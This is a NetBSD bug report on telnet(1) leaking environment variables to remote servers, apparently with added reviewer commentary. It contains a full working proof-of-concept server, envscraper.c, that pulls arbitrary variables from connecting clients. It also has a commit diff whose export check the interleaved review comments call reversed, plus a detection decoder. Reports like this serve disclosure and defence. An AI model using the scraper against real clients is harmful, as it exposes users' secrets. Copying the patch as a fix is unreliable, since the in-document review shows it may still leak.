NetBSD Problem Report #60081
Date: Sat, 14 Mar 2026 19:50:22 +0000 (UTC)
From: campbell+netbsd@mumble.net
Reply-To: campbell+netbsd@mumble.net
To: gnats-bugs@NetBSD.org
Subject: telnet(1) leaks environment variables to remote host
>Number: 60081
>Category: bin
>Synopsis: telnet(1) leaks environment variables to remote host
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible: bin-bug-people
>State: needs-pullups
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Sat Mar 14 19:55:00 +0000 2026
>Closed-Date:
>Last-Modified: Sun Mar 15 12:50:01 +0000 2026
>Originator: Taylor R Campbell
>Release: current, 11, 10, 9, 8, 7, 6, 5, 4, 3, ...
>Organization:
The TelnetBSD Foundaleak, Inc.
>Environment:
>Description:
From Justin Swartz on oss-security@:
> In a recent oss-security thread [1] regarding the CVE-1999-0073 [2]
> regression in GNU inetutils telnetd, Solar Designer suggested [3]
> that the inetutils telnet client may not have been subject to an
> adequate fix for CVE-2005-0488. [4]
>
> If this were the case, then it would mean that a telnet server could
> possibly read a client's environment variables with the NEW-ENVIRON
> option and the SEND ENV_USERVAR command.
>
> So, I wrote a simple proof of concept (attached below this message
> as envscraper.c) to find out if I could convince a telnet client to
> tell me the value of an arbitrary environment variable.
>
> [...]
>
> FreeBSD 16.0-CURRENT & NetBSD 11.0-RC2 [VULNERABLE]
>
> Both clients unconditionally leak any requested environment
> variable. No export required.
https://www.openwall.com/lists/oss-security/2026/03/13/1
>How-To-Repeat:
/*
 * Attempt to extract an environment variable from a telnet client.
 * $ cc -o envscraper envscraper.c -Wall -Werror -Wextra -pedantic
 */

#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define IP_ADDRESS  htonl(0x7f000001)
#define PORT        htons(23232)

#define IAC         "\xff"
#define DO          "\xfd"
#define SB          "\xfa"
#define SE          "\xf0"
#define NEW_ENVIRON "\x27"
#define SEND        "\x01"
#define USERVAR     "\x03"

static int server = -1, client = -1;

static void usage(FILE *stream)
{
    fprintf(stream, "usage: envscraper VARIABLE\n");
}

static int setup(void)
{
    int reuse = 1;
    struct sockaddr_in address = { .sin_family = AF_INET };
    socklen_t length = sizeof(address);

    server = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (server == -1) {
        perror("socket");
        return -1;
    }

    if (setsockopt(server, SOL_SOCKET,
                   SO_REUSEADDR, &reuse, sizeof(reuse)) == -1) {
        perror("setsockopt: SO_REUSEADDR");
        return -1;
    }

    address.sin_addr.s_addr = IP_ADDRESS;
    address.sin_port = PORT;

    if (bind(server, (struct sockaddr *)&address, sizeof(address)) == -1) {
        perror("bind");
        return -1;
    }

    if (listen(server, 1) == -1) {
        perror("listen");
        return -1;
    }

    client = accept(server, (struct sockaddr *)&address, &length);
    if (client == -1) {
        perror("accept");
        return -1;
    }

    return 0;
}

static int serve(char *variable)
{
    const char accost[] = IAC DO NEW_ENVIRON;
    const char demand[] = IAC SB NEW_ENVIRON SEND USERVAR;
    const char end[] = IAC SE;
    int count;
    size_t total = 0;
    char ransom[1024];
    struct timeval wait = { .tv_sec = 1 };

    if (send(client, accost, sizeof(accost) - 1, 0) == -1) {
        perror("send: accost");
        return -1;
    }

    if (send(client, demand, sizeof(demand) - 1, 0) == -1) {
        perror("send: demand");
        return -1;
    }

    if (send(client, variable, strlen(variable), 0) == -1) {
        perror("send: variable");
        return -1;
    }

    if (send(client, end, sizeof(end) - 1, 0) == -1) {
        perror("send: end");
        return -1;
    }

    if (setsockopt(client, SOL_SOCKET,
                   SO_RCVTIMEO, (const char *)&wait, sizeof(wait)) == -1) {
        perror("setsockopt: SO_RCVTIMEO");
        return -1;
    }

    while (total < sizeof(ransom)) {
        count = recv(client, ransom + total, sizeof(ransom) - total, 0);
        if (count == 0)
            break;
        if (count == -1) {
            if (errno == EWOULDBLOCK || errno == EAGAIN)
                break;
            perror("recv: ransom");
            return -1;
        }
        total += count;
    }

    if (write(STDOUT_FILENO, ransom, total) == -1) {
        perror("write: stdout");
        return -1;
    }

    return 0;
}

static void cleanup(void)
{
    if (client > -1)
        close(client);
    if (server > -1)
        close(server);
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        usage(stderr);
        return EXIT_FAILURE;
    }

    atexit(cleanup);

    if (setup() == -1)
        return EXIT_FAILURE;

    if (serve(argv[1]) == -1)
        return EXIT_FAILURE;

    return EXIT_SUCCESS;
}
>Fix:
don't send env vars if they're not marked exported, like OpenBSD did back in 2005
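
For detection on the client side of the wire, a decoder for the NEW-ENVIRON SEND subnegotiation lets a proxy or capture tool log which variables a server asks for. This is an added example, not part of the report or of NetBSD's telnet; `parse_env_send`, `struct env_req` and the sample bytes are constructed here.

```c
#include <stdio.h>
#include <string.h>
/* Telnet and NEW-ENVIRON (RFC 1572) codes, the same bytes the PoC sends. */
enum { IAC = 0xff, SB = 0xfa, SE = 0xf0, NEW_ENVIRON = 0x27,
       ENV_SEND = 1, ENV_VAR = 0, ENV_ESC = 2, ENV_USERVAR = 3 };
struct env_req { int type; char name[64]; };   /* hypothetical record */
/* Constructed sample: IAC DO NEW-ENVIRON, then SEND USERVAR EXAMPLE_TOKEN VAR USER. */
static const unsigned char sample[] =
    "\xff\xfd\x27" "\xff\xfa\x27\x01" "\x03" "EXAMPLE_TOKEN" "\x00" "USER" "\xff\xf0";

/* Decode the first IAC SB NEW-ENVIRON SEND ... IAC SE in buf.  Returns the number
 * of names requested (0 = server asked for everything), or -1 if none/incomplete. */
int parse_env_send(const unsigned char *buf, size_t len, struct env_req *out, int max)
{
    struct env_req *cur = NULL;
    size_t i, k = 0;
    int n = 0;
    for (i = 0; i + 4 <= len; i++)
        if (buf[i] == IAC && buf[i + 1] == SB &&
            buf[i + 2] == NEW_ENVIRON && buf[i + 3] == ENV_SEND)
            break;
    if (i + 4 > len)
        return -1;
    for (i += 4; i < len; ) {
        unsigned char c = buf[i++];
        if (c == IAC) {
            if (i < len && buf[i] == SE)
                return n;
            if (i >= len || buf[i++] != IAC)
                return -1;              /* truncated, or a stray command */
        } else if (c == ENV_VAR || c == ENV_USERVAR) {
            if (n == max)
                return -1;              /* more names than the caller allows */
            cur = &out[n++];
            cur->type = c;
            memset(cur->name, 0, sizeof(cur->name));
            k = 0;
            continue;
        } else if (c == ENV_ESC && i < len) {
            c = buf[i++];               /* ESC: next byte is part of the name */
        }
        if (cur != NULL && k + 1 < sizeof(cur->name))
            cur->name[k++] = (char)c;
    }
    return -1;                          /* never saw IAC SE */
}

int main(void)
{
    struct env_req r[4];
    int n = parse_env_send(sample, sizeof(sample) - 1, r, 4);
    for (int i = 0; i < n; i++)
        printf("%s %s\n", r[i].type == ENV_USERVAR ? "USERVAR" : "VAR", r[i].name);
    return n < 0;
}
```

Names a server requests that the user never marked for export are the ones worth alerting on.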
>Release-Note:
>Audit-Trail:
From: Paul Goyette <paul@whooppee.com>
To: gnats-bugs@netbsd.org
Cc: gnats-admin@netbsd.org, netbsd-bugs@netbsd.org
Subject: Re: bin/60081: telnet(1) leaks environment variables to remote host
Date: Sat, 14 Mar 2026 13:25:18 -0700 (PDT)
shouldn't this be category==security ?
+---------------------+--------------------------+----------------------+
| Paul Goyette (.sig) | PGP Key fingerprint: | E-mail addresses: |
| (Retired) | 1B11 1849 721C 56C8 F63A | paul@whooppee.com |
| Software Developer | 6E2E 05FD 15CE 9F2D 5102 | pgoyette@netbsd.org |
| & Network Engineer | | pgoyette99@gmail.com |
+---------------------+--------------------------+----------------------+
From: Thomas Klausner <wiz@netbsd.org>
To: gnats-bugs@netbsd.org
Cc:
Subject: Re: bin/60081: telnet(1) leaks environment variables to remote host
Date: Sat, 14 Mar 2026 21:27:46 +0100
I think this was handled already, see attached commit message.
Thomas
Date: Fri, 13 Mar 2026 15:41:02 -0400
From: "Christos Zoulas" <christos@netbsd.org>
Subject: CVS commit: src/usr.bin/telnet
To: source-changes-full@NetBSD.org
Module Name: src
Committed By: christos
Date: Fri Mar 13 19:41:02 UTC 2026
Modified Files:
src/usr.bin/telnet: authenc.c commands.c externs.h telnet.c
Log Message:
Only send exported variables (from OpenBSD):
https://www.openwall.com/lists/oss-security/2026/03/13/1
To generate a diff of this commit:
cvs rdiff -u -r1.14 -r1.15 src/usr.bin/telnet/authenc.c
cvs rdiff -u -r1.80 -r1.81 src/usr.bin/telnet/commands.c
cvs rdiff -u -r1.44 -r1.45 src/usr.bin/telnet/externs.h \
src/usr.bin/telnet/telnet.c
Please note that diffs are not public domain; they are subject to the
copyright notices on the relevant files.
Modified files:
Index: src/usr.bin/telnet/authenc.c
diff -u src/usr.bin/telnet/authenc.c:1.14 src/usr.bin/telnet/authenc.c:1.15
--- src/usr.bin/telnet/authenc.c:1.14 Fri Dec 14 18:40:17 2018
+++ src/usr.bin/telnet/authenc.c Fri Mar 13 15:41:02 2026
@@ -1,4 +1,4 @@
-/* $NetBSD: authenc.c,v 1.14 2018/12/14 23:40:17 christos Exp $ */
+/* $NetBSD: authenc.c,v 1.15 2026/03/13 19:41:02 christos Exp $ */
/*-
* Copyright (c) 1991, 1993
@@ -34,7 +34,7 @@
#if 0
static char sccsid[] = "@(#)authenc.c 8.1 (Berkeley) 6/6/93";
#else
-__RCSID("$NetBSD: authenc.c,v 1.14 2018/12/14 23:40:17 christos Exp $");
+__RCSID("$NetBSD: authenc.c,v 1.15 2026/03/13 19:41:02 christos Exp $");
#endif
#endif /* not lint */
@@ -85,7 +85,7 @@ telnet_spin(void)
char *
telnet_getenv(char *val)
{
- return env_getvalue(val);
+ return env_getvalue(val, 0);
}
char *
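Review bot: The bare 0 in `env_getvalue(val, 0)` in telnet_getenv() does not tell a reader which behaviour this caller gets. With the condition added in commands.c, `(exported || ep->export)`, a 0 means only variables whose export flag is set are returned, so telnet_getenv() now returns NULL for unexported variables where it previously returned their value. If that is intended for this caller, say so in a comment or use a named constant at the call site.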
Index: src/usr.bin/telnet/commands.c
diff -u src/usr.bin/telnet/commands.c:1.80 src/usr.bin/telnet/commands.c:1.81
--- src/usr.bin/telnet/commands.c:1.80 Fri Jul 8 17:51:24 2022
+++ src/usr.bin/telnet/commands.c Fri Mar 13 15:41:02 2026
@@ -1,4 +1,4 @@
-/* $NetBSD: commands.c,v 1.80 2022/07/08 21:51:24 mlelstv Exp $ */
+/* $NetBSD: commands.c,v 1.81 2026/03/13 19:41:02 christos Exp $ */
/*
* Copyright (C) 1997 and 1998 WIDE Project.
@@ -63,7 +63,7 @@
#if 0
static char sccsid[] = "@(#)commands.c 8.4 (Berkeley) 5/30/95";
#else
-__RCSID("$NetBSD: commands.c,v 1.80 2022/07/08 21:51:24 mlelstv Exp $");
+__RCSID("$NetBSD: commands.c,v 1.81 2026/03/13 19:41:02 christos Exp $");
#endif
#endif /* not lint */
@@ -1791,11 +1791,11 @@ env_default(int init, int welldefined)
}
char *
-env_getvalue(const char *var)
+env_getvalue(const char *var, int exported)
{
struct env_lst *ep;
- if ((ep = env_find(var)) != NULL)
+ if ((ep = env_find(var)) != NULL && (exported || ep->export))
return ep->value;
return NULL;
}
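Review bot: The test `(exported || ep->export)` in env_getvalue() returns the value whenever `exported` is non-zero, without looking at ep->export at all, and the only caller in this patch that passes 1 is env_opt_add() in telnet.c, which sizes the option reply from the value. As written, that path still hands back variables that are not marked exported, while the local DISPLAY and TERM lookups (passing 0) are the ones that are now gated, which reads as the reverse of the log message "Only send exported variables". Suggest `(!exported_only || ep->export)` with the parameter renamed to match, or swapping the 0/1 at the call sites, and a comment documenting the parameter.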
Index: src/usr.bin/telnet/externs.h
diff -u src/usr.bin/telnet/externs.h:1.44 src/usr.bin/telnet/externs.h:1.45
--- src/usr.bin/telnet/externs.h:1.44 Fri Dec 14 18:40:17 2018
+++ src/usr.bin/telnet/externs.h Fri Mar 13 15:41:02 2026
@@ -1,4 +1,4 @@
-/* $NetBSD: externs.h,v 1.44 2018/12/14 23:40:17 christos Exp $ */
+/* $NetBSD: externs.h,v 1.45 2026/03/13 19:41:02 christos Exp $ */
/*
* Copyright (c) 1988, 1990, 1993
@@ -216,7 +216,7 @@ struct env_lst *env_unexport(const char
struct env_lst *env_send(const char *, char *);
struct env_lst *env_list(const char *, char *);
char *env_default(int, int );
-char *env_getvalue(const char *);
+char *env_getvalue(const char *, int);
void env_varval(const char *);
int auth_cmd(int, char *[]);
int ayt_status(void);
Index: src/usr.bin/telnet/telnet.c
diff -u src/usr.bin/telnet/telnet.c:1.44 src/usr.bin/telnet/telnet.c:1.45
--- src/usr.bin/telnet/telnet.c:1.44 Sat Oct 30 09:43:40 2021
+++ src/usr.bin/telnet/telnet.c Fri Mar 13 15:41:02 2026
@@ -1,4 +1,4 @@
-/* $NetBSD: telnet.c,v 1.44 2021/10/30 13:43:40 hannken Exp $ */
+/* $NetBSD: telnet.c,v 1.45 2026/03/13 19:41:02 christos Exp $ */
/*
* Copyright (c) 1988, 1990, 1993
@@ -34,7 +34,7 @@
#if 0
static char sccsid[] = "@(#)telnet.c 8.4 (Berkeley) 5/30/95";
#else
-__RCSID("$NetBSD: telnet.c,v 1.44 2021/10/30 13:43:40 hannken Exp $");
+__RCSID("$NetBSD: telnet.c,v 1.45 2026/03/13 19:41:02 christos Exp $");
#endif
#endif /* not lint */
@@ -468,7 +468,7 @@ dooption(int option)
#endif
case TELOPT_XDISPLOC: /* X Display location */
- if (env_getvalue((const unsigned char *)"DISPLAY"))
+ if (env_getvalue("DISPLAY", 0))
new_state_ok = 1;
break;
@@ -731,7 +731,7 @@ gettermname(void)
resettermname = 0;
if (tnamep && tnamep != unknown)
free(tnamep);
- if ((tname = (char *)env_getvalue((const unsigned char *)"TERM")) &&
+ if ((tname = env_getvalue("TERM", 0)) &&
(setupterm(tname, 1, &err) == 0)) {
tnamep = mklist(termbuf, tname);
} else {
@@ -898,7 +898,7 @@ suboption(void)
unsigned char temp[50], *dp;
int len;
- if ((dp = env_getvalue((const unsigned char *)"DISPLAY")) == NULL) {
+ if ((dp = env_getvalue("DISPLAY", 0)) == NULL) {
/*
* Something happened, we no longer have a DISPLAY
* variable. So, turn off the option.
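Review bot: `dp` is declared `unsigned char *` in the context line above, but env_getvalue() is prototyped in externs.h as returning `char *`, so `dp = env_getvalue("DISPLAY", 0)` now assigns across signedness with no cast. Either cast the result or declare `dp` as `char *`; otherwise this draws a -Wpointer-sign warning.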
@@ -1513,7 +1513,7 @@ env_opt_add(unsigned char *ep)
env_opt_add(ep);
return;
}
- vp = env_getvalue(ep);
+ vp = env_getvalue(ep, 1);
elen = 2 * (vp ? strlen((char *)vp) : 0) +
2 * strlen((char *)ep) + 6;
if ((unsigned int)(opt_replyend - opt_replyp) < elen)
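Review bot: `env_getvalue(ep, 1)` in env_opt_add() passes 1, and with the condition `(exported || ep->export)` from commands.c a non-zero argument skips the export check, so the value that goes into the option reply is still returned for unexported variables. This is the call that should require ep->export. Separately, `ep` is `unsigned char *` and is passed to a `const char *` parameter without a cast, and the `char *` result is stored in `vp`, which the next line has to cast back with `(char *)vp`.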
@@ -2074,7 +2074,7 @@ telnet(const char *user)
send_will(TELOPT_LINEMODE, 1);
send_will(TELOPT_NEW_ENVIRON, 1);
send_do(TELOPT_STATUS, 1);
- if (env_getvalue((const unsigned char *)"DISPLAY"))
+ if (env_getvalue("DISPLAY", 0))
send_will(TELOPT_XDISPLOC, 1);
if (eight)
tel_enter_binary(eight);
From: Christos Zoulas <christos@zoulas.com>
To: Paul Goyette <paul@whooppee.com>
Cc: gnats-bugs@netbsd.org,
gnats-admin@netbsd.org,
netbsd-bugs@netbsd.org
Subject: Re: bin/60081: telnet(1) leaks environment variables to remote host
Date: Sat, 14 Mar 2026 18:38:42 -0400
I've already committed the changes.
christos
> On Mar 14, 2026, at 4:25 PM, Paul Goyette <paul@whooppee.com> wrote:
>
> shouldn't this be category==security ?
>
>
> +---------------------+--------------------------+----------------------+
> | Paul Goyette (.sig) | PGP Key fingerprint: | E-mail addresses: |
> | (Retired) | 1B11 1849 721C 56C8 F63A | paul@whooppee.com |
> | Software Developer | 6E2E 05FD 15CE 9F2D 5102 | pgoyette@netbsd.org |
> | & Network Engineer | | pgoyette99@gmail.com |
> +---------------------+--------------------------+----------------------+
State-Changed-From-To: open->needs-pullups
State-Changed-By: riastradh@NetBSD.org
State-Changed-When: Sat, 14 Mar 2026 23:36:01 +0000
State-Changed-Why:
needs pullup-11, pullup-10, pullup-9
From: "David H. Gutteridge" <david@gutteridge.ca>
To: Gnats Bugs <gnats-bugs@netbsd.org>
Cc:
Subject: Re: bin/60081: telnet(1) leaks environment variables to remote host
Date: Sun, 15 Mar 2026 08:48:46 -0400
christos@ committed a fix for this here:
https://mail-index.netbsd.org/source-changes/2026/03/13/msg160975.html
Though no pullup tickets exist, presently.
>Unformatted: